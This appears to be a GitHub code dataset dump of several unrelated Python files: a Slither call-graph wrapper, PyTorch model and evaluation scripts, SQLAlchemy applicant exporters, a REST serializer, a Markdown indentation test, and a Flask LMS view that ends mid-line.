"doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.sqrt", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.triu_indices", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 76, "usage_type": "call"}, {"api_name": "Solver.TGMRF_solver.TGMRF_solver", "line_number": 79, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 85, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.normalize", "line_number": 92, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 92, "usage_type": "name"}, {"api_name": "numpy.dot", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 120, "usage_type": "call"}, {"api_name": "time.time", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path", "line_number": 129, "usage_type": "attribute"}, {"api_name": "Solver.TGMRF_solver.TGMRF_solver", "line_number": 136, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 142, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 151, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 154, "usage_type": "call"}, {"api_name": "time.time", "line_number": 156, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.normalize", "line_number": 167, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 167, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path", "line_number": 176, "usage_type": "attribute"}, {"api_name": "numpy.cov", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.linalg.svd", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 182, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 186, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 200, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 226, "usage_type": "call"}]}
+{"seq_id": "71764659047", "text": "import subprocess # library used to interact with command line\nimport os\nimport re\nfrom graphviz import Source\n\n# slither proxy class for grnrrating the call graph\nclass SlitherProxy:\n def __init__(self):\n self.current_dir = os.getcwd()\n self.output_folder = self.current_dir\n\n def genCallGraph(self, contractName):\n try:\n subprocess.run(['slither', contractName, '--print', 'call-graph'])\n call_graph_filename = f'{contractName}.all_contracts.call-graph.dot'\n call_graph_path = os.path.join(self.output_folder, call_graph_filename)\n\n if os.path.exists(call_graph_path):\n call_graph_png_path = os.path.join(self.output_folder, f'{contractName}.all_contracts.call-graph.dot.png')\n graph_source = Source.from_file(call_graph_path, format=\"png\")\n graph_source.render(view=False) # Optional: Open the PNG file after rendering\n print(f\"Call Graph saved to: {call_graph_path}\")\n return call_graph_png_path\n else:\n print(\"Error: Call graph file not created.\")\n except subprocess.CalledProcessError as e:\n print(f\"Error executing Slither: {e}\")\n #def highlightCallGraph(self, contractName):\n def genListOf_VarFun(self, contractName, output_file='output.txt'):\n # command to generate list of state variables and functions\n subprocess.run(['slither', contractName, '--print', 'vars-and-auth'])\n with open(output_file, 'w') as output_file:\n result = subprocess.run(['slither', contractName, '--print', 'vars-and-auth'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)\n cleaned_output = re.sub(r'\\x1b\\[[0-9;]*[mK]', '', result.stdout + result.stderr) # Remove ANSI escape codes\n output_file.write(cleaned_output)\n def get_state_variables(self, output_file_path):\n # Read the content of the output.txt file\n with open(output_file_path, 'r') as file:\n output_content = file.read()\n\n # Find all matches for state variables\n state_variables_matches = re.findall(r'\\|\\s+(\\w+)\\s+\\|\\s+\\[([^]]*)\\]\\s+\\|', output_content)\n\n # Extract state variables excluding those starting with '_'\n state_variables = [var.strip(\"'\") for function, variables in state_variables_matches for var in variables.split(', ') if not var.strip(\"'\").startswith('_')]\n\n # Remove duplicates\n state_variables = list(set(state_variables))\n\n return state_variables\n\n# Example usage:\n# result = subprocess.run(['slither', contractPath, '--print', 'vars-and-auth']\n # , shell=True, capture_output=True)\n # # Access the output\n # output = result.stdout\n # return output\n\n\n\n\n", "repo_name": "zainab-yousaf/FYP-Fuzzing", "sub_path": "slither.py", "file_name": "slither.py", "file_ext": "py", "file_size_in_byte": 2788, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.getcwd", "line_number": 9, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "graphviz.Source.from_file", "line_number": 20, "usage_type": "call"}, {"api_name": "graphviz.Source", "line_number": 20, "usage_type": "name"}, {"api_name": "subprocess.CalledProcessError", "line_number": 26, "usage_type": "attribute"}, {"api_name": "subprocess.run", "line_number": 31, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 33, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 33, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 34, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 42, "usage_type": "call"}]}
+{"seq_id": "34460881121", "text": "import torch\n\nfrom music_genre_classification.models.classification_model import (\n TorchMertClassIncrementalModel,\n)\n\n\nclass TorchL2PClassIncrementalModel(TorchMertClassIncrementalModel):\n def forward(self, inputs: torch.Tensor):\n outputs, key_loss = self.encoder(inputs)\n outputs = self.decoder(outputs)\n return outputs, key_loss\n", "repo_name": "pedrocg42/music-genre-classification", "sub_path": "music_genre_classification/models/torch_l2p_class_incremental_model.py", "file_name": "torch_l2p_class_incremental_model.py", "file_ext": "py", "file_size_in_byte": 359, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "music_genre_classification.models.classification_model.TorchMertClassIncrementalModel", "line_number": 8, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 9, "usage_type": "attribute"}]}
+{"seq_id": "19629383239", "text": "from sqlalchemy import Integer, cast, extract, func\nfrom sqlalchemy.future import select\n\nfrom common.database import Application, ApplicationStatus, Participant, School\n\nfrom .base import Exporter\n\n\nclass MLHRegistered(Exporter):\n header = [\n \"First name\",\n \"Last name\",\n \"Age\",\n \"Email\",\n \"School\",\n \"Phone number\",\n \"Country\",\n \"Level of study\",\n \"Acknowledged checkboxes\",\n ]\n statement = (\n select(\n Participant.first_name,\n Participant.last_name,\n cast(extract(\"year\", func.age(Application.date_of_birth)), Integer),\n Participant.email,\n School.name,\n Application.phone_number,\n Application.country,\n Application.level_of_study,\n Application.legal_agreements_acknowledged,\n )\n .join_from(Application, Participant)\n .join_from(Application, School)\n )\n\n\nclass ResumeBook(Exporter):\n header = [\n \"First name\",\n \"Last name\",\n \"Email\",\n \"Age\",\n \"Country\",\n \"School\",\n \"Major\",\n \"Level of study\",\n \"Graduation year\",\n \"Portfolio URL\",\n \"VCS URL\",\n \"Has Resume?\",\n ]\n statement = (\n select(\n Participant.first_name,\n Participant.last_name,\n Participant.email,\n cast(extract(\"year\", func.age(Application.date_of_birth)), Integer),\n Application.country,\n School.name,\n Application.major,\n Application.level_of_study,\n Application.graduation_year,\n Application.portfolio_url,\n Application.vcs_url,\n Application.resume != None,\n )\n .join_from(Application, Participant)\n .join_from(Application, School)\n .where(Application.status == ApplicationStatus.ACCEPTED)\n .where(Application.share_information)\n )\n\n\nclass All(Exporter):\n header = [\n \"First name\",\n \"Last name\",\n \"Email\",\n \"Phone Number\",\n \"Age\",\n \"Gender\",\n \"Race / Ethnicity\",\n \"Country\",\n \"School\",\n \"Major\",\n \"Level of Study\",\n \"Graduation Year\",\n \"Hackathons Attended\",\n \"Portfolio URL\",\n \"VCS URL\",\n \"Share Information?\",\n \"Checked-in?\",\n \"Status\",\n ]\n statement = (\n select(\n Participant.first_name,\n Participant.last_name,\n Participant.email,\n Application.phone_number,\n cast(extract(\"year\", func.age(Application.date_of_birth)), Integer),\n Application.gender,\n Application.race_ethnicity,\n Application.country,\n School.name,\n Application.major,\n Application.level_of_study,\n Application.graduation_year,\n Application.hackathons_attended,\n Application.portfolio_url,\n Application.vcs_url,\n Application.share_information,\n Participant.checked_in,\n Application.status,\n )\n .join_from(Application, Participant)\n .join_from(Application, School)\n )\n", "repo_name": "WaffleHacks/application-portal", "sub_path": "tasks/handlers/integration/export/applications.py", "file_name": "applications.py", "file_ext": "py", "file_size_in_byte": 3237, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "base.Exporter", "line_number": 9, "usage_type": "name"}, {"api_name": "common.database.Application", "line_number": 34, "usage_type": "argument"}, {"api_name": "common.database.School", "line_number": 34, "usage_type": "argument"}, {"api_name": "common.database.Application", "line_number": 33, "usage_type": "argument"}, {"api_name": "common.database.Participant", "line_number": 33, "usage_type": "argument"}, {"api_name": "sqlalchemy.future.select", "line_number": 22, "usage_type": "call"}, {"api_name": "common.database.Participant.first_name", "line_number": 23, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 23, "usage_type": "name"}, {"api_name": "common.database.Participant.last_name", "line_number": 24, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 24, "usage_type": "name"}, {"api_name": "sqlalchemy.cast", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 25, "usage_type": "argument"}, {"api_name": "sqlalchemy.extract", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.func.age", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 25, "usage_type": "name"}, {"api_name": "common.database.Application.date_of_birth", "line_number": 25, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 25, "usage_type": "name"}, {"api_name": "common.database.Participant.email", "line_number": 26, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 26, "usage_type": "name"}, {"api_name": "common.database.School.name", "line_number": 27, "usage_type": "attribute"}, {"api_name": "common.database.School", "line_number": 27, "usage_type": "name"}, {"api_name": "common.database.Application.phone_number", "line_number": 28, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 28, "usage_type": "name"}, {"api_name": "common.database.Application.country", "line_number": 29, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 29, "usage_type": "name"}, {"api_name": "common.database.Application.level_of_study", "line_number": 30, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 30, "usage_type": "name"}, {"api_name": "common.database.Application.legal_agreements_acknowledged", "line_number": 31, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 31, "usage_type": "name"}, {"api_name": "base.Exporter", "line_number": 38, "usage_type": "name"}, {"api_name": "common.database.Application", "line_number": 69, "usage_type": "argument"}, {"api_name": "common.database.School", "line_number": 69, "usage_type": "argument"}, {"api_name": "common.database.Application", "line_number": 68, "usage_type": "argument"}, {"api_name": "common.database.Participant", "line_number": 68, "usage_type": "argument"}, {"api_name": "sqlalchemy.future.select", "line_number": 54, "usage_type": "call"}, {"api_name": "common.database.Participant.first_name", "line_number": 55, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 55, "usage_type": "name"}, {"api_name": "common.database.Participant.last_name", "line_number": 56, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 56, "usage_type": "name"}, {"api_name": "common.database.Participant.email", "line_number": 57, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 57, "usage_type": "name"}, {"api_name": "sqlalchemy.cast", "line_number": 58, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 58, "usage_type": "argument"}, {"api_name": "sqlalchemy.extract", "line_number": 58, "usage_type": "call"}, {"api_name": "sqlalchemy.func.age", "line_number": 58, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 58, "usage_type": "name"}, {"api_name": "common.database.Application.date_of_birth", "line_number": 58, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 58, "usage_type": "name"}, {"api_name": "common.database.Application.country", "line_number": 59, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 59, "usage_type": "name"}, {"api_name": "common.database.School.name", "line_number": 60, "usage_type": "attribute"}, {"api_name": "common.database.School", "line_number": 60, "usage_type": "name"}, {"api_name": "common.database.Application.major", "line_number": 61, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 61, "usage_type": "name"}, {"api_name": "common.database.Application.level_of_study", "line_number": 62, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 62, "usage_type": "name"}, {"api_name": "common.database.Application.graduation_year", "line_number": 63, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 63, "usage_type": "name"}, {"api_name": "common.database.Application.portfolio_url", "line_number": 64, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 64, "usage_type": "name"}, {"api_name": "common.database.Application.vcs_url", "line_number": 65, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 65, "usage_type": "name"}, {"api_name": "common.database.Application.resume", "line_number": 66, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 66, "usage_type": "name"}, {"api_name": "common.database.Application.status", "line_number": 70, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 70, "usage_type": "name"}, {"api_name": "common.database.ApplicationStatus.ACCEPTED", "line_number": 70, "usage_type": "attribute"}, {"api_name": "common.database.ApplicationStatus", "line_number": 70, "usage_type": "name"}, {"api_name": "common.database.Application.share_information", "line_number": 71, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 71, "usage_type": "name"}, {"api_name": "base.Exporter", "line_number": 75, "usage_type": "name"}, {"api_name": "common.database.Application", "line_number": 118, "usage_type": "argument"}, {"api_name": "common.database.School", "line_number": 118, "usage_type": "argument"}, {"api_name": "common.database.Application", "line_number": 117, "usage_type": "argument"}, {"api_name": "common.database.Participant", "line_number": 117, "usage_type": "argument"}, {"api_name": "sqlalchemy.future.select", "line_number": 97, "usage_type": "call"}, {"api_name": "common.database.Participant.first_name", "line_number": 98, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 98, "usage_type": "name"}, {"api_name": "common.database.Participant.last_name", "line_number": 99, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 99, "usage_type": "name"}, {"api_name": "common.database.Participant.email", "line_number": 100, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 100, "usage_type": "name"}, {"api_name": "common.database.Application.phone_number", "line_number": 101, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 101, "usage_type": "name"}, {"api_name": "sqlalchemy.cast", "line_number": 102, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 102, "usage_type": "argument"}, {"api_name": "sqlalchemy.extract", "line_number": 102, "usage_type": "call"}, {"api_name": "sqlalchemy.func.age", "line_number": 102, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 102, "usage_type": "name"}, {"api_name": "common.database.Application.date_of_birth", "line_number": 102, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 102, "usage_type": "name"}, {"api_name": "common.database.Application.gender", "line_number": 103, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 103, "usage_type": "name"}, {"api_name": "common.database.Application.race_ethnicity", "line_number": 104, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 104, "usage_type": "name"}, {"api_name": "common.database.Application.country", "line_number": 105, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 105, "usage_type": "name"}, {"api_name": "common.database.School.name", "line_number": 106, "usage_type": "attribute"}, {"api_name": "common.database.School", "line_number": 106, "usage_type": "name"}, {"api_name": "common.database.Application.major", "line_number": 107, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 107, "usage_type": "name"}, {"api_name": "common.database.Application.level_of_study", "line_number": 108, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 108, "usage_type": "name"}, {"api_name": "common.database.Application.graduation_year", "line_number": 109, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 109, "usage_type": "name"}, {"api_name": "common.database.Application.hackathons_attended", "line_number": 110, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 110, "usage_type": "name"}, {"api_name": "common.database.Application.portfolio_url", "line_number": 111, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 111, "usage_type": "name"}, {"api_name": "common.database.Application.vcs_url", "line_number": 112, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 112, "usage_type": "name"}, {"api_name": "common.database.Application.share_information", "line_number": 113, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 113, "usage_type": "name"}, {"api_name": "common.database.Participant.checked_in", "line_number": 114, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 114, "usage_type": "name"}, {"api_name": "common.database.Application.status", "line_number": 115, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 115, "usage_type": "name"}]}
+{"seq_id": "75041765927", "text": "from rest_framework import serializers\r\nfrom nt_resource.models import CatNormalResource\r\nfrom nt_core.utils import get_current_timestamp\r\n\r\n\r\nclass CatNormalResourceListSerializer(serializers.ModelSerializer):\r\n class Meta:\r\n model = CatNormalResource\r\n fields = '__all__'\r\n\r\n def update(self, instance, validated_data):\r\n instance.appid = validated_data.get('appid', instance.appid)\r\n instance.response_time = validated_data.get(\r\n 'response_time', instance.response_time\r\n )\r\n\r\n instance.update_time = get_current_timestamp()\r\n instance.save()\r\n return instance\r\n", "repo_name": "harvardfly/network_anomaly_detection", "sub_path": "nt_resource/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 639, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 45, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 6, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 6, "usage_type": "name"}, {"api_name": "nt_resource.models.CatNormalResource", "line_number": 8, "usage_type": "name"}, {"api_name": "nt_core.utils.get_current_timestamp", "line_number": 17, "usage_type": "call"}]}
+{"seq_id": "44294345628", "text": "\"\"\"\nTest suite to check if the indentation of the .md is mostly correct.\n\"\"\"\nimport glob\nimport os\nimport unittest\n\nimport mkdocs.utils.meta\n\nfrom tests.path_constants import DOCS_DIR\n\n\nclass IndentationTest(unittest.TestCase):\n \"\"\"\n Indentation TestCase Class\n \"\"\"\n\n admonition_prefixes = (\"!!!\", \"???\", \"===\")\n list_prefixes = (\"-\", \"+\", \"*\")\n codeblock_prefix = \"```\"\n\n def test_admonitions_and_lists(self) -> None:\n \"\"\"\n Test that the indentation of admonitions and lists is correct\n \"\"\"\n paths = glob.glob(\"**/*.md\", root_dir=DOCS_DIR, recursive=True)\n for path in paths:\n file_path = os.path.join(DOCS_DIR, path)\n\n with open(file_path, encoding=\"utf-8-sig\") as file:\n source = file.read()\n\n contents, meta = mkdocs.utils.meta.get_data(source)\n\n last_line = \"\"\n inside_admonition = False\n admonition_valid = False\n inside_codeblock = False\n inside_list = False\n\n for n, line in enumerate(contents.split(\"\\n\"), start=1):\n if inside_admonition and admonition_valid:\n if line.lstrip(\" \") == line:\n inside_admonition = False\n\n if inside_admonition and line.strip():\n self.assertTrue(\n len(line) - len(line.lstrip(\" \")) >= 4,\n f\"The admonition content has to start with 4 or more spaces\\n\"\n f\"File: {file_path}\\n\"\n f\"Line:{n}: {line}\",\n )\n admonition_valid = True\n\n if line.startswith(self.admonition_prefixes):\n inside_admonition = True\n admonition_valid = False\n\n if line.startswith(self.codeblock_prefix):\n inside_codeblock = not inside_codeblock\n\n if line.strip() == \"\":\n inside_list = False\n\n # TODO rewrite it someday with regex\n if line.startswith(self.list_prefixes) and not inside_codeblock:\n self.assertTrue(\n len(line) >= 2,\n \"List entries must have content\\n\"\n f\"File: {file_path}\\n\"\n f\"Line:{n}: {line}\",\n )\n if line[1] == \" \":\n self.assertTrue(\n last_line.strip() == \"\"\n or last_line.strip().startswith(self.list_prefixes)\n or last_line.strip().startswith(\"#\")\n or inside_list,\n \"Lists need to have an empty line before them\\n\"\n f\"File: {file_path}\\n\"\n f\"Line:{n}: {line}\",\n )\n inside_list = True\n\n self.assertTrue(\n line[1] == \" \" or (line[0] == \"*\" and line.count(\"*\") % 2 == 0),\n \"List markers need to be separated by a space\\n\"\n f\"File: {file_path}\\n\"\n f\"Line:{n}: '{line}'\",\n )\n\n last_line = line\n\n self.assertTrue(\n not inside_codeblock, f\"File: {file_path} ended without closing a codeblock\"\n )\n\n print(f\"✅Tested {len(paths)} paths\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n", "repo_name": "Gothic-Modding-Community/gmc", "sub_path": "tests/test_indentation.py", "file_name": "test_indentation.py", "file_ext": "py", "file_size_in_byte": 3544, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestCase", "line_number": 13, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 26, "usage_type": "call"}, {"api_name": "tests.path_constants.DOCS_DIR", "line_number": 26, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "tests.path_constants.DOCS_DIR", "line_number": 28, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "mkdocs.utils.meta.utils.meta.get_data", "line_number": 33, "usage_type": "call"}, {"api_name": "mkdocs.utils.meta.utils", "line_number": 33, "usage_type": "attribute"}, {"api_name": "mkdocs.utils.meta", "line_number": 33, "usage_type": "name"}, {"api_name": "unittest.main", "line_number": 102, "usage_type": "call"}]}
+{"seq_id": "70200420650", "text": "import os\nimport torch\nimport logging\nimport pdb\n\nfrom torch import nn, optim\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom config.opts import Config\nfrom model.model import *\nfrom model.model_attn import *\nfrom utils.loader import *\nfrom utils.utils import *\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\ndef write_(labels):\n\twith open('data/test.txt', 'r') as f:\n\t\tlines = f.readlines()\n\twith open('data/test_.txt', 'a') as f:\n\t\tf.write('\\t'.join(['id', 'turn1', 'turn2', 'turn3', 'label'])+'\\n')\n\t\tfor i, line in enumerate(lines[1:]):\n\t\t\tline_new = line.strip() + '\\t' + labels[i] + '\\n'\n\t\t\tf.write(line_new)\n\t\n\ndef test_sep(**kwargs):\n\tinput_ = kwargs['input']\n\tmodel = kwargs['model'].to(device)\n\tlmap = kwargs['lmap']\n\tilmap = {v:k for k,v in lmap.items()}\n\n\t# pdb.set_trace()\n\teval_object = Eval(lmap)\n\ttest_data_loader = DataLoader(dataset=input_,\n\t\t\t\t\t\t\t\tbatch_size=32)\n\tresults = []\n\tfor i, batch in enumerate(tqdm(test_data_loader)):\n\t\tinput_feature = [batch['input'][i].to(device) for i in range(len(batch['input']))]\n\t\toutput = model(input_feature)\n\t\tprediction = output.contiguous()\n\t\tprediction = eval_object.decode(prediction)\n\t\tprediction = prediction.cpu().numpy().tolist()\n\t\tresults.extend([ilmap[prediction[i]] for i in range(len(prediction))])\n\twrite_(results)\n\ndef test(**kwargs):\n\tinput_ = kwargs['input']\n\tmodel = kwargs['model']\n\tlmap = kwargs['lmap']\n\teval_object = Eval(lmap)\n\tresults = []\n\tilmap = {v:k for k,v in lmap.items()}\n\tfor idx in trange(len(input_)):\n\n\t\tsequence = torch.from_numpy(input_[idx]['feature']).to(device)\n\t\ttext = input_[idx]['input']\n\t\t# sequence = sequence.permute(1, 0)\n\t\tsequence = torch.unsqueeze(sequence, 0)\n\t\toutput = model(sequence)\n\t\tprediction = output.contiguous()\n\t\t# pdb.set_trace()\n\t\tprediction = eval_object.decode(prediction)\n\n\t\tresults.append(ilmap[prediction.cpu().numpy()[0]])\n\twrite_(results)\n\ndef test_batch(**kwargs):\n\tinput_ = kwargs['input']\n\tmodel = kwargs['model'].to(device)\n\tlmap = kwargs['lamp']\n\tilmap = {v:k for k,v in lmap.items()}\n\t# pdb.set_trace()\n\teval_object = Eval(lmap)\n\ttest_data_loader = DataLoader(dataset=input_,\n\t\t\t\t\t\t\t\tbatch_size=32)\n\tresults = []\n\tfor iteration, batch in enumerate(tqdm(test_data_loader)):\n\t\tinput_feature = batch['feature'].to(device)\n\t\tpdb.set_trace()\n\t\toutput = model(input_feature)\n\t\tprediction = output.contiguous()\n\t\tprediction = eval_object.decode(prediction)\n\t\tresults.extend(ilmap[prediction.cpu().numpy()[0]])\n\twrite_(results)\n\ndef main(**kwargs):\n\topt = Config()\n\topt._parse(kwargs)\n\tpath = opt.path\n\tlmap = opt.lmap\n\tvector_size = '%dd'%opt.inp\n\tdatasets = {} \n\t# datasets['test'] = TweetData_V02(path,'test',lmap, vector_size=vector_size)\n\t\n\tnIn = opt.inp\n\tdatasets = TweetData_V02('data/test.txt', lmap, nIn)\n\tnHidden = opt.hidden\t\n\tnClasses = opt.out\n\tdepth = opt.depth\n\tfilters = opt.filters\n\tseqlen = 156\n\t# model = RCNN_Text(nIn, nHidden).to(device)\n\t# model = Turnip(nIn, nHidden, nClasses, depth).to(device)\n\t# model = RCNN(nIn, nHidden, nClasses, seqlen, filters).cuda()\n\tmodel = RNN_attn(nIn, nHidden, nClasses, depth).to(device)\n\tsave_dir = opt.save_dir\n\t# gmkdir(save_dir)\n\tsave_file = opt.save_file\n\tsavepath = save_dir + '/' + save_file\n\tcheckpoint = torch.load(savepath)\n\tmodel.load_state_dict(checkpoint['state_dict'])\n\ttest_sep(input=datasets,\n\t\tmodel=model,\n\t\tlmap=lmap)\n\nif __name__ == '__main__':\n\timport fire\n\tfire.Fire(main)\n", "repo_name": "Deepayan137/EmoContext", "sub_path": "evaluate.py", "file_name": "evaluate.py", "file_ext": "py", "file_size_in_byte": 3435, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.device", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 15, "usage_type": "attribute"}, {"api_name": "model.model", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 34, "usage_type": "call"}, {"api_name": "model.model", "line_number": 39, "usage_type": "call"}, {"api_name": "model.model", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.unsqueeze", "line_number": 58, "usage_type": "call"}, {"api_name": "model.model", "line_number": 59, "usage_type": "call"}, {"api_name": "model.model", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 74, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 79, "usage_type": "call"}, {"api_name": "model.model", "line_number": 80, "usage_type": "call"}, {"api_name": "config.opts.Config", "line_number": 87, "usage_type": "call"}, {"api_name": "model.model", "line_number": 105, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 110, "usage_type": "call"}, {"api_name": "model.model.load_state_dict", "line_number": 111, "usage_type": "call"}, {"api_name": "model.model", "line_number": 111, "usage_type": "name"}, {"api_name": "model.model", "line_number": 113, "usage_type": "name"}, {"api_name": "fire.Fire", "line_number": 118, "usage_type": "call"}]}
+{"seq_id": "12441493421", "text": "from flask.json import jsonify\nfrom app.auth.models import Role, User\nfrom prime_admin.forms import PartnerForm, SecretaryEditForm, SecretaryForm, StudentForm, TeacherForm, TrainingCenterEditForm, TrainingCenterForm\nfrom flask_login import login_required, current_user\nfrom app.admin.templating import admin_render_template, admin_table, admin_edit\nfrom prime_admin import bp_lms\nfrom prime_admin.models import Branch, Secretary\nfrom flask import redirect, url_for, request, current_app, flash\nfrom app import mongo\nfrom datetime import datetime\nfrom config import TIMEZONE\nfrom prime_admin.globals import SECRETARYREFERENCE\n\n\n\n@bp_lms.route('/secretaries')\n@login_required\ndef secretaries():\n return admin_render_template(\n Secretary,\n 'lms/secretaries.html',\n 'learning_management',\n title=\"Secretaries\"\n )\n \n # form = SecretaryForm()\n # _table_data = []\n # secretary_role = Role.objects(name=\"Secretary\").first()\n # _secretaries = User.objects(role=secretary_role)\n # for secretary in _secretaries:\n # _table_data.append((\n # secretary.id,\n # secretary.fname,\n # secretary.lname,\n # secretary.branch.name if secretary.branch is not None else '',\n # secretary.created_by,\n # secretary.created_at_local,\n # secretary.updated_by,\n # secretary.updated_at_local\n # ))\n\n # return admin_table(\n # Secretary,\n # fields=[],\n # form=form,\n # table_data=_table_data,\n # create_button=None,\n # create_url=None,\n # create_modal=False,\n # # create_url='lms.create_secretary',\n # edit_url='lms.edit_secretary',\n # view_modal_url='/learning-management/get-view-secretary-data'\n # )\n\n\n@bp_lms.route('/secretaries/dt', methods=['GET'])\ndef fetch_secretaries_dt():\n draw = request.args.get('draw')\n start, length = int(request.args.get('start')), int(request.args.get('length'))\n search_value = request.args.get(\"search[value]\")\n\n total_records: int\n filtered_records: int\n\n if search_value != '':\n query = 